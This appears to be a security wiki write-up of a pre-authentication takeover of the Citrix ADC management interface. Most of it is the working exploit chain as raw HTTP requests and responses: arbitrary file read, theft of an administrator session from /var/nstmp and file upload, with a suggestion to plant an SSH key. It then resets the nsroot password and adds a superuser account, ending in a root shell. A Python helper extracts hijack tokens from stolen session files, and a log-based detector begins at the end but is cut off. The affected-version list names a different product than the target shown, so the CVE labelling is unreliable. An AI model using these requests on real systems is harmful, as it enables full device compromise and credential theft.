    29.82 KB / 2021-07-15 19:49:28
        (CVE-2020-7473)Citrix 认证绕过getshell
    ========================================
    
    1. Vulnerability overview
    ------------

    The chain below targets the Citrix ADC (NetScaler) management interface on port 9080 and needs no credentials to start. `POST /pcidss/report` with `sid=loginchallengeresponse1requestbody` fails with `MISMATCH_OBJECTNAME_ERROR` but still sets a `SESSID` cookie (0x01); `GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1` initialises that session for `username=nsroot` (0x02); `/menu/stc` then renders the `rand` anti-CSRF value even though it reports an invalid login (0x03). With that value in the `rand_key` header, `POST /rapi/filedownload?filter=path:<urlencoded path>` returns arbitrary files and directory listings (0x05, 0x06). Reading `/var/nstmp/sess_*` hands over the PHP session of a logged-in administrator, and its SESSID and `rand` are enough to write files through `/rapi/uploadtext` (0x07) and to reset the `nsroot` password or add a superuser account through the NITRO API (0x08, 0x09), which ends in a root shell over SSH. One detail that matters when scripting this: a successful file read still comes back as `HTTP/1.1 406 Not Acceptable`; the `Content-Disposition: attachment` header, not the status code, marks success.

    2. Affected versions
    ------------
    
    ShareFile storage zones Controller 5.9.0
    
    ShareFile storage zones Controller 5.8.0
    
    ShareFile storage zones Controller 5.7.0
    
    ShareFile StorageZones Controller 5.6.0
    
    ShareFile StorageZones Controller 5.5.0
    
    and earlier ShareFile StorageZones Controller versions

    Note that this version list refers to ShareFile StorageZones Controller, while the target in the reproduction below identifies itself as Citrix ADC VPX, `NS12.1: Build 55.13.nc` (see the `nsversion` field of the session file read in 0x06).
    
    3. Reproduction steps
    ------------
    
    ### 0x01 CreateSession
    
    > request
    
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
        Content-Length: 44
        Accept-Encoding: gzip, deflate
        Connection: close
        Content-Type: application/xml
        Range: bytes=0-102400
        X-Nitro-Pass: jr9bt
        X-Nitro-User: boej3
    
        <appfwprofile><login></login></appfwprofile>
    
    > response
    
        HTTP/1.1 406 Not Acceptable
        Date: Sun, 12 Jul 2020 07:52:00 GMT
        Server: Apache/2.4.34 (Unix)
        Set-Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; path=/; HttpOnly
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Content-Length: 4489
        Connection: close
        Content-Type: application/xml; charset=utf-8
    
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. 
Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
    
    ### 0x02 Fix session
    
    > request
    
        GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57
        Range: bytes=0-102400
    
    > response
    
        HTTP/1.1 302 Found
        Date: Sun, 12 Jul 2020 07:54:31 GMT
        Server: Apache/2.4.34 (Unix)
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Set-Cookie: is_cisco_platform=-1; expires=Wed, 07-Jul-2021 07:54:32 GMT; Max-Age=31104000; path=/; HttpOnly
        Location: /menu/neo
        Content-Length: 416
        Connection: close
        Content-Type: text/html; charset=UTF-8
    
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
    
    ### 0x03 Get rand\_key
    
    > request
    
        GET /menu/stc HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 C845D9D38B3A68F4F74057DB542AD252 tx/2.0
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
        Range: bytes=0-102400
    
    > response
    
        HTTP/1.1 206 Partial Content
        Date: Sun, 12 Jul 2020 07:54:35 GMT
        Server: Apache/2.4.34 (Unix)
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Range: bytes 0-4149/4150
        Content-Length: 15501
        Connection: close
        Content-Type: text/html; charset=UTF-8
    
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
        <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <title>Citrix ADC - Statistics</title>
        <link href="/admin_ui/common/css/ns/ui.css" rel="stylesheet" type="text/css" />
        <script type="text/javascript" src="/admin_ui/common/js/jquery/_jquery.min.js"></script>
        <script type="text/javascript">
        //rand is used in utils.js in the URL to logout and in the URL to update NSAPI token
        //rand_key & rand are used in utils.js to avoid CSRF in all POST requests
        var rand = "181103693.1594540472072128";
        var rand_key = "14247218531594540472072170";
        var NSERR_SESSION_EXPIRED = 444;
    
        </script>
        ...
        <p align="center" class="ns_alert_text"><b>Error retrieving data.<br>return code = 354.<br>Error message = Invalid username or password.<br></b></p></div>
    
    Note: the value sent later in the `rand_key` request header is the `rand` variable (`var rand = "181103693.1594540472072128";` here), not the `rand_key` variable on the same page; compare the `rand_key` header in 0x05 and 0x07 with the `rand` field of the session file read in 0x06. The page reports `Invalid username or password`, but the anti-CSRF values are rendered anyway.
    
    ### 0x04 re-break Session
    
    > request
    
        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: python-requests/2.20.0
        Content-Length: 44
        Accept-Encoding: gzip, deflate
        Connection: close
        Content-Type: application/xml
        Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=-1
        Range: bytes=0-102400
        X-NITRO-USER: mMg96GTR
        X-NITRO-PASS: QXom91tz
    
        <appfwprofile><login></login></appfwprofile>
    
    > response
    
        HTTP/1.1 406 Not Acceptable
        Date: Sun, 12 Jul 2020 07:54:49 GMT
        Server: Apache/2.4.34 (Unix)
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Content-Length: 4489
        Connection: close
        Content-Type: application/xml; charset=utf-8
    
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. 
Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
        <div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><?xml version="1.0"?>
        <nitroResponse><errorcode>-1</errorcode><message>MISMATCH_OBJECTNAME_ERROR</message><severity>ERROR</severity></nitroResponse>
    
    ### 0x05 Read Dir
    
    > request
    
        POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: python-requests/2.20.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: N6RRf049
        X-NITRO-PASS: FcdXbqXr
        rand_key: 32946879.1594556816473396
        Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
        Content-Length: 31
    
        <clipermission></clipermission>
    
    > response
    
        HTTP/1.1 406 Not Acceptable
        Date: Sun, 12 Jul 2020 12:27:04 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Expires: -1
        Cache-Control: private, must-revalidate, post-check=0, pre-check=0
        Pragma: private
        Content-Disposition: attachment;filename="nstmp"
        Accept-Ranges: bytes
        Content-Length: 512
        X-XSS-Protection: 1; mode=block
        Keep-Alive: timeout=15, max=98
        Connection: Keep-Alive
        Content-Type: application/octet-stream
    
        ...
        sess_6680400dad3be5585d4ac9880d5f634f...
        sess_774dd8a02a254bd09c480cd0ba244598...
        sess_6c5c31300c22b200f0273e7a13be47cb....
    
    ### 0x06 Read Session
    
    > request
    
        POST /rapi/filedownload?filter=path:%2Fvar%2Fnstmp%2Fsess_6c5c31300c22b200f0273e7a13be47cb HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: python-requests/2.20.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Type: application/xml
        X-NITRO-USER: N6RRf049
        X-NITRO-PASS: FcdXbqXr
        rand_key: 32946879.1594556816473396
        Cookie: SESSID=eb1780b044676f588dbcc2a6305f6b57; is_cisco_platform=0; startupapp=neo
        Content-Length: 31
    
        <clipermission></clipermission>
    
    > response
    
        HTTP/1.1 406 Not Acceptable
        Date: Sun, 12 Jul 2020 12:30:33 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Expires: -1
        Cache-Control: private, must-revalidate, post-check=0, pre-check=0
        Pragma: private
        Content-Disposition: attachment;filename="sess_6c5c31300c22b200f0273e7a13be47cb"
        Accept-Ranges: bytes
        Content-Length: 2162
        X-XSS-Protection: 1; mode=block
        Keep-Alive: timeout=15, max=100
        Connection: Keep-Alive
        Content-Type: application/octet-stream
    
        NSAPI|s:254:"##703FFFA9A2E71F7435B67182A95E196770FF69246DB68B6BE92E825B8A520D00F1FCF6E23F897090DBDEDBE817FFE81D1501200A8BB36C9FFA176EDA41E473DC240A804B90B8BFE1EC30DA87C6FAD3261A8B3C09C7BB82F97DDB3DB41A69CA0B849AFD6B17827463358B700D5847F91F78619B8FA1A98ED4DED3509AB11C";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";login_warning|s:0:"";sysid|s:6:"450070";oemid|s:1:"0";superuser|s:4:"true";nsbw|i:0;ns_is_sgw|s:5:"false";nsbrandDesc|s:7:"ADC VPX";username|s:6:"nsroot";timezone_offset|i:28800;nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov  4 2019, 22:20:18   (64-bit)";nsversion_error|b:0;ns_mode|i:2;nshostDesc|s:22:"49.234.251.224 (ADC01)";nsbrand|s:2:"NS";nsvpx|s:3:"VPX";ns_model|s:4:"1000";ns_aws_pin|s:0:"";ns_is_aws|s:5:"false";ns_is_azure|s:5:"false";ns_is_gcp|s:5:"false";rand|s:26:"845810655.1594556994263502";rand_key|s:26:"13590513441594556994263577";licenseMap|a:62:{s:2:"wl";b:1;s:2:"sp";b:1;s:2:"lb";b:1;s:2:"cs";b:1;s:2:"cr";b:1;s:2:"sc";b:1;s:3:"cmp";b:1;s:5:"delta";b:0;s:2:"pq";b:1;s:3:"ssl";b:1;s:4:"gslb";b:1;s:5:"gslbp";b:1;s:5:"hdosp";b:1;s:7:"routing";b:1;s:2:"cf";b:1;s:18:"contentaccelerator";b:0;s:2:"ic";b:0;s:6:"sslvpn";b:1;s:14:"f_sslvpn_users";s:4:"1000";s:11:"f_ica_users";s:1:"0";s:3:"aaa";b:1;s:4:"ospf";b:1;s:3:"rip";b:1;s:3:"bgp";b:1;s:7:"rewrite";b:1;s:6:"ipv6pt";b:1;s:5:"appfw";b:0;s:9:"responder";b:1;s:4:"agee";b:0;s:4:"nsxn";b:1;s:13:"htmlinjection";b:1;s:7:"modelid";s:4:"1000";s:4:"push";b:1;s:6:"wionns";b:1;s:7:"appflow";b:1;s:11:"cloudbridge";b:0;s:20:"cloudbridgeappliance";b:0;s:22:"cloudextenderappliance";b:0;s:4:"isis";b:1;s:7:"cluster";b:1;s:2:"ch";b:1;s:6:"appqoe";b:1;s:10:"appflowica";b:1;s:13:"isstandardlic";b:0;s:15:"isenterpriselic";b:1;s:13:"isplatinumlic";b:0;s:9:"issgwylic";b:0;s:8:"isswglic";b:0;s:4:"rise";b:1;s:3:"feo";b:1;s:3:"lsn";b:1;s:13:"licensingmode";s:5:"Local";s:16:"daystoexpiration";s:2:"50";s:8:"rdpproxy";b:1;s:3:"rep";b:0;s:12:"urlfiltering";b:0;s:17:"videooptimization";b:0;s:12:"forwardproxy";b:0;s:15:"sslinterception";b:0;s:23:"remotecontentinspection";b:1;s:11:"adaptivetcp";b:0;s:3:"cqa";b:0;}grouping_separator|s:1:",";decimal_separator|s:1:".";defaultpartition|s:7:"default";
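The session file above is in PHP `session_encode` format: `key|value` pairs whose values use the PHP `serialize()` encoding (`s:<len>:"..."`, `i:`, `b:`, `a:<n>:{...}`), with no separator after an array's closing `}`. The two pieces needed for the following steps are the `rand` field, which is what the `rand_key` header in 0x07 carries, and the SESSID, which is the suffix of the `sess_` file name. The parser below is an added example written for this page, not code from the original post or from Citrix; it runs on a shortened, constructed sample in the same shape as the response above (the `NSAPI` token is made up), and it parses string lengths as byte counts because that is what PHP writes.

```python
#!/usr/bin/env python3
"""Parse a PHP session file (session_encode format, as in /var/nstmp/sess_<id>)
and pull out the material needed for the session hijack."""

import re

# Constructed sample in the shape of the 0x06 response; the NSAPI token is shortened.
SAMPLE_SESSION = (
    b'NSAPI|s:6:"##ABCD";NSAPI_DOMAIN|s:0:"";NSAPI_PATH|s:1:"/";'
    b'superuser|s:4:"true";nsbw|i:0;username|s:6:"nsroot";'
    b'nsversion|s:63:" NS12.1: Build 55.13.nc, Date: Nov  4 2019, 22:20:18   (64-bit)";'
    b'nsversion_error|b:0;rand|s:26:"845810655.1594556994263502";'
    b'rand_key|s:26:"13590513441594556994263577";'
    b'licenseMap|a:2:{s:2:"wl";b:1;s:5:"appfw";b:0;}defaultpartition|s:7:"default";'
)


def _parse_value(data, pos):
    """Parse one PHP serialize() value starting at data[pos]; return (value, next_pos).
    s:N lengths are byte lengths, so data must be bytes."""
    t = data[pos:pos + 1]
    if t == b's':
        colon = data.index(b':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                      # skip ':"'
        raw = data[start:start + length]
        if data[start + length:start + length + 2] != b'";':
            raise ValueError('bad string terminator at offset %d' % pos)
        return raw.decode('utf-8', 'replace'), start + length + 2
    if t in (b'i', b'd'):
        end = data.index(b';', pos)
        raw = data[pos + 2:end]
        return (int(raw) if t == b'i' else float(raw)), end + 1
    if t == b'b':
        return data[pos + 2:pos + 3] == b'1', pos + 4
    if t == b'N':
        return None, pos + 2
    if t == b'a':
        colon = data.index(b':', pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                        # skip ':{'
        items = {}
        for _ in range(count):
            key, pos = _parse_value(data, pos)
            val, pos = _parse_value(data, pos)
            items[key] = val
        if data[pos:pos + 1] != b'}':
            raise ValueError('bad array terminator at offset %d' % pos)
        return items, pos + 1
    raise ValueError('unsupported type %r at offset %d' % (t, pos))


def parse_php_session(blob):
    """session_encode layout: key|value key|value ... (no ';' after an array's '}')."""
    data = blob if isinstance(blob, bytes) else blob.encode('utf-8')
    pos, fields = 0, {}
    while pos < len(data):
        bar = data.index(b'|', pos)
        key = data[pos:bar].decode('utf-8')
        fields[key], pos = _parse_value(data, bar + 1)
    return fields


SESS_NAME = re.compile(r'^sess_([0-9a-f]{32})$')


def hijack_material(filename, blob):
    """SESSID is the file-name suffix; the rand_key *header* takes the rand field
    (compare the 0x07 request with the rand/rand_key fields in 0x06)."""
    m = SESS_NAME.match(filename)
    if not m:
        raise ValueError('not a session file name: %r' % filename)
    fields = parse_php_session(blob)
    return {
        'SESSID': m.group(1),
        'rand_key_header': fields.get('rand'),
        'username': fields.get('username'),
        'superuser': fields.get('superuser') == 'true',
        'nsversion': (fields.get('nsversion') or '').strip(),
    }


if __name__ == '__main__':
    print(hijack_material('sess_6c5c31300c22b200f0273e7a13be47cb', SAMPLE_SESSION))
```

Feed it the bytes returned by the 0x06 download together with the file name from the 0x05 listing; a `superuser` of `true` with `username` `nsroot` is the session worth taking over.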
    
    ### 0x07 UploadFile Getshell
    
    The same upload can target `/root/.ssh/authorized_keys` to plant an SSH key (the request below only writes a test file to `/tmp/`). Note: from this step on, the `rand_key` header and the `SESSID` cookie come from the hijacked administrator session read in 0x06: `SESSID` is the 32-character suffix of the `sess_<32 characters>` file name, and `rand_key` is the `rand` field stored in that file.
    
    > request
    
        POST /rapi/uploadtext HTTP/1.1
        Host: www.0-sec.org:9080
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: https://citrix.local/menu/neo
        DNT: 1
        rand_key: 845810655.1594556994263502
        Cookie: SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 92
    
        object={"uploadtext":{"filedir":"/tmp/","filedata":"123456","filename":"test123456789.txt"}}
    
    > response
    
        HTTP/1.1 200 OK
        Date: Sun, 12 Jul 2020 06:15:05 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        X-XSS-Protection: 1; mode=block
        Content-Length: 34
        Content-Type: application/json; charset=utf-8
    
        {"errorcode":"0","message":"Done"}
    
    ### 0x08 ChangePassword && SSH
    
    > request
    
        PUT /nitro/v1/config/systemuser HTTP/1.1
        Host: www.0-sec.org:9080
        Content-Length: 83
        Cache-Control: max-age=0
        Accept: application/json
        rand_key: 845810655.1594556994263502
        NITRO_WEB_APPLICATION: true
        If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        DNT: 1
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
        Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
        Connection: close
    
        {"params":{"warning":"YES"},"systemuser":{"username":"nsroot","password":"boiboi"}}
    
    > response
    
        HTTP/1.1 200 OK
        Date: Sun, 12 Jul 2020 12:37:56 GMT
        Server: Apache/2.4.34 (Unix)
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Content-Length: 57
        Connection: close
        Content-Type: application/json; charset=utf-8
    
        { "errorcode": 0, "message": "Done", "severity": "NONE" }

    > SSH with the new nsroot password (`<target>` stands for the appliance address, which the page does not show)

        ssh nsroot@<target>
        ###############################################################################
        #                                                                             #
        #        WARNING: Access to this system is for authorized users only          #
        #         Disconnect IMMEDIATELY if you are not an authorized user!           #
        #                                                                             #
        ###############################################################################
    
        Password:
        Last login: Sun Jul 12 14:12:44 2020 from 192.168.3.1
         Done
         > shell
        Copyright (c) 1992-2013 The FreeBSD Project.
        Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
            The Regents of the University of California. All rights reserved.
    
        root@localhost
    
    ### 0x09 CreateUser && SSH
    
    > request:CreateUser
    
        POST /nitro/v1/config/systemuser HTTP/1.1
        Host: www.0-sec.org:9080
        Content-Length: 83
        Cache-Control: max-age=0
        Accept: application/json
        rand_key: 845810655.1594556994263502
        NITRO_WEB_APPLICATION: true
        If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        DNT: 1
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
        Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
        Connection: close
    
        object={"params":{"warning":"YES"},"systemuser":{"username":"nsroot1","password":"nsroot1","timeout":"900","maxsession":"20","logging":"ENABLED","externalauth":"ENABLED"}}
    
    > response:CreateUser
    
        HTTP/1.1 201 Created
        Date: Sun, 12 Jul 2020 12:46:55 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Credentials: false
        X-XSS-Protection: 1; mode=block
        Content-Length: 57
        Keep-Alive: timeout=15, max=100
        Connection: Keep-Alive
        Content-Type: application/json; charset=utf-8
    
        { "errorcode": 0, "message": "Done", "severity": "NONE" }

    > request: bind the superuser command policy to the new account

        POST /nitro/v1/config/systemuser_systemcmdpolicy_binding HTTP/1.1
        Host: www.0-sec.org:9080
        Content-Length: 83
        Cache-Control: max-age=0
        Accept: application/json
        rand_key: 845810655.1594556994263502
        NITRO_WEB_APPLICATION: true
        If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        DNT: 1
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
        Cookie: is_cisco_platform=-1; rdx_pagination_size=25%20Per%20Page; SESSID=6c5c31300c22b200f0273e7a13be47cb; startupapp=neo
        Connection: close
    
        object={"params":{"warning":"YES"},"systemuser_systemcmdpolicy_binding":{"policyname":"superuser","priority":"0","username":"nsroot1"}}

    > response: bind the superuser command policy

        HTTP/1.1 201 Created
        Date: Sun, 12 Jul 2020 12:55:27 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Credentials: false
        X-XSS-Protection: 1; mode=block
        Content-Length: 57
        Keep-Alive: timeout=15, max=100
        Connection: Keep-Alive
        Content-Type: application/json; charset=utf-8
    
        { "errorcode": 0, "message": "Done", "severity": "NONE" }

    > SSH as the new nsroot1 account (`<target>` stands for the appliance address, which the page does not show)

        ssh nsroot1@<target>
        ###############################################################################
        #                                                                             #
        #        WARNING: Access to this system is for authorized users only          #
        #         Disconnect IMMEDIATELY if you are not an authorized user!           #
        #                                                                             #
        ###############################################################################
    
        Password:
        Last login: Sun Jul 12 20:52:27 2020 from 47.75.37.35
         Done
        > shell
        Copyright (c) 1992-2013 The FreeBSD Project.
        Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
            The Regents of the University of California. All rights reserved.
    
        root@localhost#
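Every step above leaves a request in the access log of the management interface, so the chain can be recognised from logs alone: `POST /pcidss/report` with `sid=loginchallengeresponse1requestbody`, `GET /menu/ss` with `force_setup=1`, `POST /rapi/filedownload` with `filter=path:` (reads under `/var/nstmp` being session theft), `POST /rapi/uploadtext`, and `PUT`/`POST` to `/nitro/v1/config/systemuser` or `systemuser_systemcmdpolicy_binding`. The detector below is an added example, not part of the original page or of any vendor tooling; it runs over constructed Apache combined-format lines (the client addresses, timestamps and log format are assumptions) and groups hits per client, so an administrator who legitimately uses the file download feature is reported as a single hit rather than as the pre-auth chain. It does not use the status code as a success signal, because the page shows successful reads returning 406.

```python
#!/usr/bin/env python3
"""Recognise the 0x01-0x09 request chain in Apache-style access logs of the
Citrix ADC management interface. All sample lines are constructed."""

import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed lines: 203.0.113.7 runs the chain, 198.51.100.9 is a normal admin.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2020:07:52:00 +0000] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 406 4489 "-" "python-requests/2.20.0"
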